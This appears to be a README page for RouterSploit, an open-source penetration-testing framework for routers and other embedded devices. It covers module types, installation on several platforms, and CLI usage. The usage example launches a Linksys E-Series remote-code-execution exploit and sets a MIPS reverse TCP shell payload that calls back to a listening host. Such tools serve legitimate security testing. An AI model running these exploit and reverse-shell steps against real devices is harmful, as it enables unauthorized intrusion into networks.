
readloud/routersploit

 
 


RouterSploit - Exploitation Framework for Embedded Devices

Python 3.6 Build Status

Community

Join the community on the Embedded Exploitation Discord.

Description

The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices.


It consists of various modules that aid penetration testing operations:

  • exploits - modules that take advantage of identified vulnerabilities
  • creds - modules designed to test credentials against network services
  • scanners - modules that check if a target is vulnerable to any exploit
  • payloads - modules that are responsible for generating payloads for various architectures and injection points
  • generic - modules that perform generic attacks

Installation

Requirements

Required:

  • requests
  • paramiko
  • pysnmp
  • pycrypto

Optional:

  • bluepy - Bluetooth low energy

Installation on Kali Linux

apt update && apt install routersploit

or

apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py

Bluetooth Low Energy support:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Installation on Ubuntu 20.04

sudo apt-get install git python3-pip
git clone https://github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py

Bluetooth Low Energy support:

sudo apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Installation on Ubuntu 18.04 & 17.10

sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install setuptools
python3 -m pip install -r requirements.txt
python3 rsf.py

Bluetooth Low Energy support:

sudo apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Installation on OSX

git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py

Running on Docker

git clone https://www.github.com/threat9/routersploit
cd routersploit
docker compose up --build -d
docker attach routersploit

To run again without rebuilding:

docker start routersploit
docker attach routersploit

Update

Update RouterSploit Framework often. The project is under heavy development and new modules are shipped almost every day.

cd routersploit
git pull

Usage example

RouterSploit CLI:

Use the Tab key multiple times for completion.

shows all modules

rsf> show all

searches

rsf> search cisco
rsf> search type=exploits
rsf> search device=cameras

selecting a module

rsf> use module_name

displaying the options of a selected module

rsf> show options

setting an option of a module

rsf> set option_name value

launching a module

rsf> run

Example:

rsf > use scanners/autopwn
rsf (AutoPwn) >
rsf (AutoPwn) > set target 192.168.0.1
[+] target => 192.168.0.1
rsf (AutoPwn) > show options
rsf (AutoPwn) > run

if the target is vulnerable, execute the exploit

rsf (AutoPwn) > use exploits/routers/linksys/eseries_themoon_rce
rsf (Linksys E-Series TheMoon RCE) > show options
rsf (Linksys E-Series TheMoon RCE) > set target 192.168.0.1
rsf (Linksys E-Series TheMoon RCE) > run
cmd> show payloads
cmd > set payload mipsle/reverse_tcp
cmd (MIPSLE Reverse TCP) > set lhost 192.168.0.30
lhost => 192.168.0.30
cmd (MIPSLE Reverse TCP) > run

Build your own

To our surprise, people started to fork routersploit not because they were interested in the security of embedded devices but simply because they wanted to leverage our interactive shell logic and build their tools using a similar concept. All these years they must have said: "There must be a better way!" and they were completely right: the better way is called Riposte.

Riposte allows you to easily wrap your application inside a tailored interactive shell. The common chores of building REPLs have been factored out and are taken care of, so you can focus on the specific domain logic of your application.

License

The RouterSploit Framework is under a BSD license. Please see LICENSE for more details.

Acknowledgments
